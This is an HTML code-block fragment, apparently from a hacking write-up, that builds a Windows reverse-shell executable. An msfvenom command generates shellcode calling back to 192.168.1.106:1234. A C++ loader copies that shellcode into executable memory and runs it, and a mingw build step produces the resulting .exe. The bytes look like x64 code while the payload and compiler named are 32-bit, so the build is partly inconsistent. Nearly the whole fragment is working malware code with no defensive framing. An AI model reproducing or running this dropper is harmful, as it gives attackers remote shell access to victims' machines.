I"S!<hr />
<div class="language-zsh highlighter-rouge"><div class="highlight"><pre class="highlight"><code>➜  ~  msfvenom <span class="nt">-p</span> windows/shell_reverse_tcp <span class="nv">LHOST</span><span class="o">=</span>192.168.1.106 <span class="nv">LPORT</span><span class="o">=</span>1234 <span class="nt">-f</span> c <span class="nt">-b</span> <span class="se">\x</span>00<span class="se">\x</span>0a<span class="se">\x</span>0d
</code></pre></div></div>
<div class="language-c++ highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">#include &lt;windows.h&gt;
</span><span class="kt">int</span> <span class="nf">main</span><span class="p">()</span> <span class="p">{</span>
<span class="kt">unsigned</span> <span class="kt">char</span> <span class="n">buf</span><span class="p">[]</span> <span class="o">=</span> 
<span class="s">"</span><span class="se">\x48\x31\xc9\x48\x81\xe9\xc6\xff\xff\xff\x48\x8d\x05\xef\xff</span><span class="s">"</span>
<span class="s">"</span><span class="se">\xff\xff\x48\xbb\xfa\x08\xce\x99\x37\x86\xc9\x09\x48\x31\x58</span><span class="s">"</span>
<span class="s">"</span><span class="se">\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4\x06\x40\x4d\x7d\xc7\x6e</span><span class="s">"</span>
<span class="s">"</span><span class="se">\x09\x09\xfa\x08\x8f\xc8\x76\xd6\x9b\x58\xac\x40\xff\x4b\x52</span><span class="s">"</span>
<span class="s">"</span><span class="se">\xce\x42\x5b\x9a\x40\x45\xcb\x2f\xce\x42\x5b\xda\x40\x45\xeb</span><span class="s">"</span>
<span class="s">"</span><span class="se">\x67\xce\xc6\xbe\xb0\x42\x83\xa8\xfe\xce\xf8\xc9\x56\x34\xaf</span><span class="s">"</span>
<span class="s">"</span><span class="se">\xe5\x35\xaa\xe9\x48\x3b\xc1\xc3\xd8\x36\x47\x2b\xe4\xa8\x49</span><span class="s">"</span>
<span class="s">"</span><span class="se">\x9f\xd1\xbc\xd4\xe9\x82\xb8\x34\x86\x98\xe7\x0d\x49\x81\xfa</span><span class="s">"</span>
<span class="s">"</span><span class="se">\x08\xce\xd1\xb2\x46\xbd\x6e\xb2\x09\x1e\xc9\xbc\xce\xd1\x4d</span><span class="s">"</span>
<span class="s">"</span><span class="se">\x71\x48\xee\xd0\x36\x56\x2a\x5f\xb2\xf7\x07\xd8\xbc\xb2\x41</span><span class="s">"</span>
<span class="s">"</span><span class="se">\x41\xfb\xde\x83\xa8\xfe\xce\xf8\xc9\x56\x49\x0f\x50\x3a\xc7</span><span class="s">"</span>
<span class="s">"</span><span class="se">\xc8\xc8\xc2\xe8\xbb\x68\x7b\x85\x85\x2d\xf2\x4d\xf7\x48\x42</span><span class="s">"</span>
<span class="s">"</span><span class="se">\x5e\x91\x4d\x71\x48\xea\xd0\x36\x56\xaf\x48\x71\x04\x86\xdd</span><span class="s">"</span>
<span class="s">"</span><span class="se">\xbc\xc6\xd5\x40\xfb\xd8\x8f\x12\x33\x0e\x81\x08\x2a\x49\x96</span><span class="s">"</span>
<span class="s">"</span><span class="se">\xd8\x6f\xd8\x90\x53\xbb\x50\x8f\xc0\x76\xdc\x81\x8a\x16\x28</span><span class="s">"</span>
<span class="s">"</span><span class="se">\x8f\xcb\xc8\x66\x91\x48\xa3\x52\x86\x12\x25\x6f\x9e\xf6\x05</span><span class="s">"</span>
<span class="s">"</span><span class="se">\xf7\x93\xd0\x89\xf1\xba\x3b\xa5\x3b\xfc\x99\x37\xc7\x9f\x40</span><span class="s">"</span>
<span class="s">"</span><span class="se">\x73\xee\x86\x18\xdb\x26\xc8\x09\xfa\x41\x47\x7c\x7e\x3a\xcb</span><span class="s">"</span>
<span class="s">"</span><span class="se">\x09\xfe\xda\x0e\x31\x36\xec\x88\x5d\xb3\x81\x2a\xd5\xbe\x77</span><span class="s">"</span>
<span class="s">"</span><span class="se">\x88\xb3\xb6\x7f\xe8\x9e\xc8\x53\x85\x80\x10\x60\xcf\x98\x37</span><span class="s">"</span>
<span class="s">"</span><span class="se">\x86\x90\x48\x40\x21\x4e\xf2\x37\x79\x1c\x59\xaa\x45\xff\x50</span><span class="s">"</span>
<span class="s">"</span><span class="se">\x7a\xb7\x09\x41\x05\xc8\x86\x10\xf5\xce\x36\xc9\xb2\x81\x0f</span><span class="s">"</span>
<span class="s">"</span><span class="se">\xd8\x8d\x6c\xc6\xd6\x1a\xf7\x1b\xd1\xbe\x41\xa3\x19\xbb\x50</span><span class="s">"</span>
<span class="s">"</span><span class="se">\x82\x10\xd5\xce\x40\xf0\xbb\xb2\x57\x3c\x43\xe7\x36\xdc\xb2</span><span class="s">"</span>
<span class="s">"</span><span class="se">\x89\x0a\xd9\x35\x86\xc9\x40\x42\x6b\xa3\xfd\x37\x86\xc9\x09</span><span class="s">"</span>
<span class="s">"</span><span class="se">\xfa\x49\x9e\xd8\x67\xce\x40\xeb\xad\x5f\x99\xd4\x06\x46\xa3</span><span class="s">"</span>
<span class="s">"</span><span class="se">\x04\xa3\x49\x9e\x7b\xcb\xe0\x0e\x4d\xde\x5c\xcf\x98\x7f\x0b</span><span class="s">"</span>
<span class="s">"</span><span class="se">\x8d\x2d\xe2\xce\xce\xf1\x7f\x0f\x2f\x5f\xaa\x49\x9e\xd8\x67</span><span class="s">"</span>
<span class="s">"</span><span class="se">\xc7\x99\x40\x05\xc8\x8f\xc9\x7e\x79\x01\x44\x73\xc9\x82\x10</span><span class="s">"</span>
<span class="s">"</span><span class="se">\xf6\xc7\x73\x70\x36\x37\x48\x66\xe2\xce\xf8\xdb\xb2\xf7\x04</span><span class="s">"</span>
<span class="s">"</span><span class="se">\x12\x39\xc7\x73\x01\x7d\x15\xae\x66\xe2\x3d\x39\xbc\x58\x5e</span><span class="s">"</span>
<span class="s">"</span><span class="se">\x8f\x23\x91\x13\x74\x94\x05\xdd\x86\x1a\xf3\xae\xf5\x0f\x86</span><span class="s">"</span>
<span class="s">"</span><span class="se">\x02\x4e\x62\xd7\xf3\xcc\xb2\xbd\x1b\xbc\xf6\x5d\x86\x90\x48</span><span class="s">"</span>
<span class="s">"</span><span class="se">\x73\xd2\x31\x4c\x37\x86\xc9\x09</span><span class="s">"</span><span class="p">;</span>
<span class="kt">void</span> <span class="o">*</span><span class="n">exec</span> <span class="o">=</span> <span class="n">VirtualAlloc</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="k">sizeof</span> <span class="n">buf</span><span class="p">,</span> <span class="n">MEM_COMMIT</span><span class="p">,</span> <span class="n">PAGE_EXECUTE_READWRITE</span><span class="p">);</span>
	<span class="n">memcpy</span><span class="p">(</span><span class="n">exec</span><span class="p">,</span> <span class="n">buf</span><span class="p">,</span><span class="k">sizeof</span> <span class="n">buf</span><span class="p">);</span>
	<span class="p">((</span><span class="kt">void</span><span class="p">(</span><span class="o">*</span><span class="p">)())</span><span class="n">exec</span><span class="p">)();</span>

    <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
<span class="err">➜</span>  <span class="o">~</span>  <span class="n">i686</span><span class="o">-</span><span class="n">w64</span><span class="o">-</span><span class="n">mingw32</span><span class="o">-</span><span class="n">g</span><span class="o">++</span> <span class="n">sh3ll</span><span class="p">.</span><span class="n">c</span> <span class="o">-</span><span class="n">o</span> <span class="n">sh3ll</span><span class="p">.</span><span class="n">exe</span> <span class="o">-</span><span class="n">lws2_32</span> <span class="o">-</span><span class="n">s</span> <span class="o">-</span><span class="n">ffunction</span><span class="o">-</span><span class="n">sections</span> <span class="o">-</span><span class="n">fdata</span><span class="o">-</span><span class="n">sections</span> <span class="o">-</span><span class="n">Wno</span><span class="o">-</span><span class="n">write</span><span class="o">-</span><span class="n">strings</span> <span class="o">-</span><span class="n">fno</span><span class="o">-</span><span class="n">exceptions</span> <span class="o">-</span><span class="n">fmerge</span><span class="o">-</span><span class="n">all</span><span class="o">-</span><span class="n">constants</span> <span class="o">-</span><span class="k">static</span><span class="o">-</span><span class="n">libstdc</span><span class="o">++</span> <span class="o">-</span><span class="k">static</span><span class="o">-</span><span class="n">libgcc</span>
<span class="err">➜</span>  <span class="o">~</span>  <span class="n">file</span> <span class="n">sh3ll</span><span class="p">.</span><span class="n">exe</span>
<span class="n">sh3ll</span><span class="p">.</span><span class="n">exe</span><span class="o">:</span> <span class="n">PE32</span> <span class="n">executable</span> <span class="p">(</span><span class="n">console</span><span class="p">)</span> <span class="n">Intel</span> <span class="mi">80386</span> <span class="p">(</span><span class="n">stripped</span> <span class="n">to</span> <span class="n">external</span> <span class="n">PDB</span><span class="p">),</span> <span class="k">for</span> <span class="n">MS</span> <span class="n">Windows</span>
</code></pre></div></div>
:ET